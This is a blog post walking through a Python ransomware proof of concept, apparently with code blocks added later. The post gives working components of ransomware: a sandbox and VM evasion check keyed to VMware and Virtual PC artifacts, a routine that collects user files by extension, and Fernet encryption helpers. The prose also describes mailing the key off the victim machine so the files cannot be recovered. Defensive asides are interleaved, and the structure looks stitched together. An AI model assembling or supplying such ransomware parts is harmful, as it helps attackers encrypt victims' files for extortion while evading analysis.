
Python Ransomware

Updated: Oct 31, 2020




Intro

This Python ransomware POC is one of the very few examples of Python-based ransomware. Python is generally considered a fast, easy language to write code in. The catch is that the Python interpreter is separate software that has to be present on the target: on Windows, the most common target among attackers, it is not installed by default, so the script either has to be bundled together with an interpreter or rely on one already being there.

Python is, however, pre-installed on most Linux distributions, which is an advantage if we are targeting a company's servers.


Python Encryption Library - Fernet

cryptography is an actively developed library that provides cryptographic recipes and primitives. Older releases supported Python 2.6-2.7 and Python 3.3+; the current release at the time of writing supports Python 2.7 and 3.5+, and the minimum version moves with each release, so check the version you install.

cryptography is divided into two layers: recipes and hazardous materials (hazmat). The recipe layer exposes a simple API for correct symmetric authenticated encryption (Fernet: AES-128-CBC with PKCS7 padding, authenticated with HMAC-SHA256), while the hazmat layer provides the low-level primitives, which are easy to misuse.

Example code using high-level symmetric encryption recipe:



Evasion

One of the POC's features is an anti-VM evasion check: if the malware detects that it is running inside a VM, it exits immediately.

Malware analysts and investigators often use isolated environments, such as virtual machines (VMs) or sandboxes, to analyze unknown code for malware. In the same manner, security products often use VMs and sandboxes to execute potentially malicious code before it is allowed into the organizational network.

To evade analysis and bypass such systems, malware authors often design their code to detect isolated environments. Once such an environment is detected, the evasion mechanism may prevent the malicious code from running, or it may alter the malware's behavior so that no malicious activity is exposed while it runs in the VM.


In our ransomware, we will try to detect processes that belong to VM guest tooling, such as:

· vmsrvc.exe – This service is part of the Virtual Machine Additions for Microsoft Virtual PC. The additions are installed inside a virtual machine to improve its performance and provide further functionality when interacting with the host system.

· vmusrvc.exe – Also part of the Virtual Machine Additions for Microsoft Virtual PC, the virtualization software that allows multiple PC-based operating systems to run simultaneously on one workstation. This process provides additional functionality such as shared folders.

· vmtoolsd.exe – VMware Tools Core Service from VMware, Inc.

We will also try to detect these driver files:

· C:\Windows\System32\drivers\vmci.sys – VMware Virtual Machine Communication Interface (VMCI) driver.

· C:\Windows\System32\drivers\vmhgfs.sys – VMware HGFS (shared folders) file system driver, developed by VMware, Inc.

Note that this list only covers Virtual PC and VMware guests; VirtualBox, Hyper-V and QEMU/KVM leave different artifacts, and analysis sandboxes can rename or hide these processes and files, so the check is a weak heuristic rather than a reliable detection.
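The check described above, written as an added example (this is not the POC's own code). The artifact list is the one the post gives; the way the running process list is gathered (tasklist on Windows, ps elsewhere) and the function and variable names are my assumptions. The matching logic takes the process list and a path-existence function as parameters so it can be exercised against a constructed host view; an analyst can run the same script inside a sandbox to see which of these artifacts it leaks.

```python
import csv
import os
import subprocess
import sys

# Artifacts named in the post: guest-tooling processes (Virtual PC, VMware)
# and VMware driver paths. Process names are compared case-insensitively.
VM_PROCESSES = {"vmsrvc.exe", "vmusrvc.exe", "vmtoolsd.exe"}
VM_DRIVER_PATHS = (
    r"C:\Windows\System32\drivers\vmci.sys",
    r"C:\Windows\System32\drivers\vmhgfs.sys",
)


def vm_indicators(process_names, path_exists=os.path.exists):
    """Return the artifacts found as 'process:<name>' / 'path:<path>' strings.

    process_names: any iterable of process image names.
    path_exists:   injected so the check can run against a constructed
                   file-system view instead of the real disk.
    """
    found = []
    seen = {name.lower() for name in process_names}
    for name in sorted(VM_PROCESSES):
        if name in seen:
            found.append("process:" + name)
    for path in VM_DRIVER_PATHS:
        if path_exists(path):
            found.append("path:" + path)
    return found


def running_process_names():
    """Image names of running processes: tasklist on Windows, ps elsewhere."""
    if sys.platform.startswith("win"):
        out = subprocess.run(["tasklist", "/FO", "CSV", "/NH"],
                             capture_output=True, text=True, check=True).stdout
        # CSV rows: "Image Name","PID","Session Name","Session#","Mem Usage"
        return [row[0] for row in csv.reader(out.splitlines()) if row]
    out = subprocess.run(["ps", "-eo", "comm="],
                         capture_output=True, text=True, check=True).stdout
    return [line.strip() for line in out.splitlines() if line.strip()]


def is_virtual_machine():
    """The POC's decision: any hit means 'we are in a VM, do not run'."""
    return bool(vm_indicators(running_process_names()))


if __name__ == "__main__":
    hits = vm_indicators(running_process_names())
    print("VM artifacts found:" if hits else "no VM artifacts found")
    for hit in hits:
        print("  ", hit)
```

Because a real sample exits as soon as `is_virtual_machine()` is true, an analysis VM that hides these process names and driver files (or renames the guest tooling) will see the payload run; that is the defender's side of the same check.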



What Files To Encrypt

The first thing ransomware has to do once it is on the system is find files to encrypt. This POC searches the "D:\" volume.


The function uses Python's built-in "os" module to collect the full paths of non-directory files under the targeted drive and append them to a list. The files are filtered by extension, so this ransomware only encrypts certain types of files –
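An enumeration function of the kind described above, as an added example that is not the POC's own code. The post does not reproduce its extension list, so the set used here is an assumption, as is the temporary sample tree the demo builds (constructed data, not real victim files); the search root is a parameter rather than the hard-coded "D:\" so the example runs on any system.

```python
import os
import tempfile

# Extension filter. The post filters on a list it does not reproduce;
# this set is an assumption used only for the example.
TARGET_EXTENSIONS = {".txt", ".docx", ".xlsx", ".pdf", ".jpg"}


def find_targets(root, extensions=TARGET_EXTENSIONS):
    """Walk `root` and return the full paths of regular files whose extension
    (case-insensitive) is in `extensions`.

    Directories are never returned; os.walk does not follow symlinked
    directories by default, so a link loop cannot make the walk endless.
    """
    wanted = {ext.lower() for ext in extensions}
    targets = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and os.path.splitext(name)[1].lower() in wanted:
                targets.append(full)
    return sorted(targets)


def build_sample_tree():
    """Constructed directory tree for the demo: two levels, mixed extensions."""
    root = tempfile.mkdtemp(prefix="targets_")
    layout = {
        "report.docx": b"doc",
        "notes.TXT": b"txt",          # upper-case extension must still match
        "photo.jpg": b"jpg",
        "setup.exe": b"exe",          # not in the filter
        os.path.join("sub", "sheet.xlsx"): b"xls",
        os.path.join("sub", "deeper", "readme.md"): b"md",  # not in the filter
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for path in find_targets(root):
        print(path)
```

Filtering on extension is also what makes this family easy to fingerprint: a process that opens hundreds of user documents in quick succession and rewrites them is exactly the pattern file-activity monitoring and honeypot files are tuned to catch.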



Encryption Key

To encrypt a message you need a Fernet key (Fernet.generate_key() produces one) and the message as bytes (convert strings to bytes with .encode()).

Fernet.encrypt() encrypts the bytes passed to it. The result, known as a "Fernet token", is the ciphertext together with a version byte, the creation timestamp, the IV and an HMAC over all of them. The timestamp is stored in plaintext: anyone holding a token can read when it was generated, since it is authenticated but not hidden. encrypt() raises a TypeError if the data is not bytes.
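The missing "example code using the high-level symmetric encryption recipe" from the Fernet section and the token behaviour described just above, as one added example (my code, not the POC's). It uses only the public cryptography API; the helper names are mine, and the token layout that token_timestamp() parses is the published Fernet specification (version byte, 8-byte big-endian timestamp, 16-byte IV, ciphertext, 32-byte HMAC), which is why the creation time can be read without the key.

```python
import base64
import struct
import time

from cryptography.fernet import Fernet, InvalidToken


def make_key():
    """Fresh 32-byte random key, URL-safe base64 encoded as Fernet expects."""
    return Fernet.generate_key()


def encrypt_bytes(key, data):
    """Encrypt `data` into a Fernet token. Like Fernet.encrypt itself, this
    refuses anything that is not bytes (encode strings first)."""
    if not isinstance(data, bytes):
        raise TypeError("data must be bytes")
    return Fernet(key).encrypt(data)


def decrypt_token(key, token):
    """Return the plaintext, or raise InvalidToken (wrong key or tampering)."""
    return Fernet(key).decrypt(token)


def is_valid_token(key, token):
    """True if the token's HMAC verifies under `key`."""
    try:
        Fernet(key).decrypt(token)
        return True
    except InvalidToken:
        return False


def token_timestamp(token):
    """Creation time (Unix seconds) read from the token without any key.

    Per the Fernet spec the base64-decoded token is: version byte 0x80,
    8-byte big-endian timestamp, 16-byte IV, AES-128-CBC ciphertext,
    32-byte HMAC-SHA256. The timestamp is authenticated but not hidden.
    """
    raw = base64.urlsafe_b64decode(token)
    if raw[:1] != b"\x80":
        raise ValueError("not a Fernet token")
    return struct.unpack(">Q", raw[1:9])[0]


def token_age_seconds(token):
    """Seconds since the token was created, from the embedded timestamp."""
    return int(time.time()) - token_timestamp(token)


def tamper(token):
    """Flip one bit inside the ciphertext; the HMAC check must then fail."""
    raw = bytearray(base64.urlsafe_b64decode(token))
    raw[30] ^= 0x01            # byte 30 lies in the ciphertext region
    return base64.urlsafe_b64encode(bytes(raw))


if __name__ == "__main__":
    key = make_key()
    token = encrypt_bytes(key, b"Q3 payroll")   # constructed sample plaintext
    print("token created:", time.ctime(token_timestamp(token)))
    print("decrypts to:", decrypt_token(key, token))
    print("tampered token valid?", is_valid_token(key, tamper(token)))
```

Two practical consequences for the POC: the readable timestamp tells an analyst exactly when each file was encrypted, and because every byte of the token is covered by the HMAC there is no way to "partially" recover a file by patching the ciphertext; recovery is entirely a question of obtaining the key.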

Bonus:

To keep the target from recovering the encryption key, it must not be left on the infected machine; in this POC it is sent out by e-mail. A key that stays on disk, or is hard-coded in the script, makes decryption trivial for any analyst who gets hold of the sample.



User Server

I added a user interface intended to give the target information about the decryption options. Just for fun…😊




Conclusion

Currently, it appears that Python-based malware is still in early development, but as we described, it already has many dangerous features implemented. It is entirely possible that in the near future Python-based ransomware will appear in the wild just as dangerous as any mature ransomware, with the time required for upgrades and modifications significantly shortened by the relative ease of coding in Python. Moreover, since it is written in Python and packaged with PyInstaller, its authors can port it to other platforms, such as Linux and macOS, by rebuilding the bundle on each platform rather than rewriting the code.

© Security Hive 2020
